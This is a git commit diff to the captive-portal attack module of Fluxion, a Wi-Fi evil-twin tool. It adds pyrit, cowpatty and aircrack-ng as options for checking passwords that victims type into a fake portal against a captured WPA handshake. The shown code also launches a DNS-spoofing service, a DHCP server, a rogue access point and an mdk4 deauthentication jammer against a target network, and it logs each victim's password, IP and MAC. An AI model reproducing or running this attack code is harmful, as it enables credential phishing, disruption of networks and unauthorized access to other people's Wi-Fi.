Added discrete options to authenticator.
The authenticator may now be directed to use one of cowpatty, pyrit, or aircrack-ng, for password verification.
This commit is contained in:
parent
0590dc0b63
commit
597275372b
|
@ -8,11 +8,6 @@ CaptivePortalState="Not Ready"
|
|||
CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
|
||||
CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"
|
||||
|
||||
CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
|
||||
CaptivePortalAuthenticationMethodsInfo=(
|
||||
"(handshake file, ${CGrn}recommended$CClr)"
|
||||
) # "(Target AP authentication, slow)")
|
||||
|
||||
# ============= < Virtual Network Configuration > ============ #
|
||||
# To avoid collapsing with an already existing network,
|
||||
# we'll use a somewhat uncommon network and server IP.
|
||||
|
@ -205,7 +200,7 @@ captive_portal_unset_authenticator() {
|
|||
if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi
|
||||
|
||||
case "$CaptivePortalAuthenticatorMode" in
|
||||
"hash")
|
||||
"hash"*)
|
||||
echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;;
|
||||
esac
|
||||
|
||||
|
@ -214,15 +209,15 @@ captive_portal_unset_authenticator() {
|
|||
# If we've only got one option, then the user skipped this section
|
||||
# by auto-selecting that single option, so we unset the previous
|
||||
# phase along with this one to properly take the user back.
|
||||
if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
|
||||
return 1 # Trigger undo chain because it was auto-selected.
|
||||
fi
|
||||
#if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
|
||||
# return 1 # Trigger undo chain because it was auto-selected.
|
||||
#fi
|
||||
}
|
||||
|
||||
captive_portal_set_authenticator() {
|
||||
if [ "$CaptivePortalAuthenticatorMode" ]; then
|
||||
case "$CaptivePortalAuthenticatorMode" in
|
||||
"hash")
|
||||
"hash"*)
|
||||
if [ "$CaptivePortalHashPath" ]; then
|
||||
echo "Captive Portal authentication mode is already set, skipping!" \
|
||||
> $FLUXIONOutputDevice
|
||||
|
@ -234,46 +229,47 @@ captive_portal_set_authenticator() {
|
|||
|
||||
captive_portal_unset_authenticator
|
||||
|
||||
# If we've got only one choice, auto-select it for the user.
|
||||
if [ \
|
||||
${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
|
||||
${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
|
||||
"$FLUXIONAuto" ]; then
|
||||
CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
|
||||
echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
|
||||
> $FLUXIONOutputDevice
|
||||
else
|
||||
fluxion_header
|
||||
# # If we've got only one choice, auto-select it for the user.
|
||||
#if [ \
|
||||
# ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
|
||||
# ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
|
||||
# "$FLUXIONAuto" ]; then
|
||||
# CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
|
||||
# echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
|
||||
# > $FLUXIONOutputDevice
|
||||
#else
|
||||
fluxion_header
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
|
||||
echo
|
||||
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
|
||||
echo
|
||||
|
||||
fluxion_target_show
|
||||
fluxion_target_show
|
||||
|
||||
local choices=(
|
||||
"${CaptivePortalAuthenticationMethods[@]}"
|
||||
"$FLUXIONGeneralBackOption"
|
||||
)
|
||||
io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \
|
||||
choices[@] CaptivePortalAuthenticationMethodsInfo[@]
|
||||
local choices=(
|
||||
"$CaptivePortalVerificationMethodPyritOption"
|
||||
"$CaptivePortalVerificationMethodCowpattyOption"
|
||||
"$CaptivePortalVerificationMethodAircrackNG"
|
||||
"$FLUXIONGeneralBackOption"
|
||||
)
|
||||
io_query_choice "" choices[@]
|
||||
|
||||
echo
|
||||
echo
|
||||
|
||||
CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}"
|
||||
CaptivePortalAuthenticatorMode="${IOQueryChoice}"
|
||||
|
||||
# If we're going back, reset everything and abort.
|
||||
if [[ \
|
||||
"$CaptivePortalAuthenticatorMode" == \
|
||||
"$FLUXIONGeneralBackOption" ]]; then
|
||||
captive_portal_unset_authenticator
|
||||
return -1
|
||||
fi
|
||||
# If we're going back, reset everything and abort.
|
||||
if [[ \
|
||||
"$CaptivePortalAuthenticatorMode" == \
|
||||
"$FLUXIONGeneralBackOption" ]]; then
|
||||
captive_portal_unset_authenticator
|
||||
return -1
|
||||
fi
|
||||
#fi
|
||||
|
||||
# Process the authentication method selected.
|
||||
local result=1 # Assume failure at first.
|
||||
case "$CaptivePortalAuthenticatorMode" in
|
||||
"hash")
|
||||
"hash"*)
|
||||
# Pass default path if no path is set yet.
|
||||
if [ ! "$CaptivePortalHashPath" ]; then
|
||||
CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
|
||||
|
@ -848,38 +844,34 @@ while [ \$AuthenticatorState = \"running\" ]; do
|
|||
|
||||
" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
|
||||
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
|
||||
# 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug.
|
||||
if which cowpatty &> /dev/null; then
|
||||
echo "
|
||||
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
|
||||
if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then
|
||||
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
|
||||
case "$CaptivePortalAuthenticatorMode" in
|
||||
# Cowpatty
|
||||
"$CaptivePortalVerificationMethodCowpattyOption")
|
||||
local -r verifiedCondition="cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> $FLUXIONOutputDevice"
|
||||
;;
|
||||
# Pyrit
|
||||
"$CaptivePortalVerificationMethodPyritOption")
|
||||
local -r verifiedCondition="pyrit -r \"$CaptivePortalHashPath\" -i \"$FLUXIONWorkspacePath/candidate.txt\" -b $FluxionTargetMAC attack_passthrough &> $FLUXIONOutputDevice"
|
||||
;;
|
||||
|
||||
sleep 1
|
||||
break
|
||||
|
||||
else
|
||||
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
|
||||
fi
|
||||
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
else
|
||||
echo "
|
||||
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
|
||||
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
|
||||
if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then
|
||||
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
|
||||
sleep 1
|
||||
break
|
||||
|
||||
else
|
||||
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
|
||||
fi
|
||||
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
fi
|
||||
*)
|
||||
# Aircrack-ng
|
||||
# Check if we've got the correct password by looking for
|
||||
# anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
|
||||
local -r verifiedCondition="aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\""
|
||||
;;
|
||||
esac
|
||||
echo "
|
||||
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
|
||||
if $verifiedCondition; then
|
||||
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
sleep 1
|
||||
break
|
||||
else
|
||||
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
|
||||
fi
|
||||
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
fi
|
||||
|
||||
local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
|
||||
|
@ -922,7 +914,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
|
|||
|
||||
echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
|
||||
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
|
||||
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
|
||||
echo "
|
||||
sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
fi
|
||||
|
@ -953,7 +945,7 @@ Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand))
|
|||
IP: $(captive_portal_get_client_IP)
|
||||
\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
|
||||
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
|
||||
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
|
||||
# echo "
|
||||
# aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\
|
||||
#" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
|
||||
|
@ -1345,41 +1337,43 @@ save_attack() {
|
|||
|
||||
stop_attack() {
|
||||
# Attempt to find PIDs of any running authenticators.
|
||||
local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}')
|
||||
#local authenticatorPID=$(pgrep
|
||||
#local authenticatorPID=$( \
|
||||
# ps a | grep -vE "xterm|grep" | \
|
||||
# grep captive_portal_authenticator.sh | awk '{print $1}' \
|
||||
#)
|
||||
|
||||
# Signal any authenticator to stop authentication loop.
|
||||
if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi
|
||||
fluxion_kill_lineage "--signal SIGABRT" \
|
||||
"xterm.+captive_portal_authenticator\\.sh"
|
||||
|
||||
if [ "$CaptivePortalJammerServiceXtermPID" ]; then
|
||||
kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \
|
||||
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
|
||||
fluxion_kill_lineage $CaptivePortalJammerServiceXtermPID
|
||||
CaptivePortalJammerServiceXtermPID="" # Clear parent PID
|
||||
fi
|
||||
sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst"
|
||||
|
||||
# Kill captive portal web server log viewer.
|
||||
if [ "$CaptivePortalWebServiceXtermPID" ]; then
|
||||
kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice
|
||||
fluxion_kill_lineage $CaptivePortalWebServiceXtermPID
|
||||
CaptivePortalWebServiceXtermPID="" # Clear service PID
|
||||
fi
|
||||
|
||||
# Kill captive portal web server.
|
||||
if [ "$CaptivePortalWebServicePID" ]; then
|
||||
kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice
|
||||
fluxion_kill_lineage $CaptivePortalWebServicePID
|
||||
CaptivePortalWebServicePID="" # Clear service PID
|
||||
fi
|
||||
|
||||
# Kill DNS service if one is found.
|
||||
if [ "$CaptivePortalDNSServiceXtermPID" ]; then
|
||||
kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
|
||||
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
|
||||
fluxion_kill_lineage $CaptivePortalDNSServiceXtermPID
|
||||
CaptivePortalDNSServiceXtermPID="" # Clear parent PID
|
||||
fi
|
||||
|
||||
# Kill DHCP service.
|
||||
if [ "$CaptivePortalDHCPServiceXtermPID" ]; then
|
||||
kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \
|
||||
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
|
||||
fluxion_kill_lineage $CaptivePortalDHCPServiceXtermPID
|
||||
CaptivePortalDHCPServiceXtermPID="" # Clear parent PID
|
||||
fi
|
||||
sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"
|
||||
|
@ -1432,6 +1426,8 @@ start_attack() {
|
|||
"dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalDHCPServiceXtermPID=$!
|
||||
echo "DHCP Service: $CaptivePortalDHCPServiceXtermPID"
|
||||
>> $FLUXIONOutputDevice
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
|
||||
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
|
||||
|
@ -1439,6 +1435,8 @@ start_attack() {
|
|||
"dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalDNSServiceXtermPID=$!
|
||||
echo "DNS Service: $CaptivePortalDNSServiceXtermPID"
|
||||
>> $FLUXIONOutputDevice
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice"
|
||||
lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \
|
||||
|
@ -1449,6 +1447,8 @@ start_attack() {
|
|||
-title "FLUXION Web Service" -e \
|
||||
"tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
|
||||
CaptivePortalWebServiceXtermPID=$!
|
||||
echo "Web Service: $CaptivePortalWebServiceXtermPID"
|
||||
>> $FLUXIONOutputDevice
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice"
|
||||
echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst"
|
||||
|
@ -1482,12 +1482,17 @@ start_attack() {
|
|||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
fi
|
||||
echo "Jammer Service: $CaptivePortalJammerServiceXtermPID"
|
||||
>> $FLUXIONOutputDevice
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
|
||||
xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \
|
||||
-title "FLUXION AP Authenticator" \
|
||||
-e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &
|
||||
|
||||
local -r authService=$!
|
||||
echo "Auth Service: $authService"
|
||||
>> $FLUXIONOutputDevice
|
||||
}
|
||||
|
||||
# FLUXSCRIPT END
|
||||
|
|
|
@ -19,6 +19,9 @@ CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr
|
|||
CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
CaptivePortalVerificationMethodQuery="Select a password verification method"
|
||||
CaptivePortalVerificationMethodPyritOption="hash - pyrit"
|
||||
CaptivePortalVerificationMethodCowpattyOption="hash - cowpatty"
|
||||
CaptivePortalVerificationMethodAircrackNG="hash - aircrack-ng (default, ${CYel}unreliable${CClr})"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal."
|
||||
CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"
|
||||
|
|
Loading…
Reference in New Issue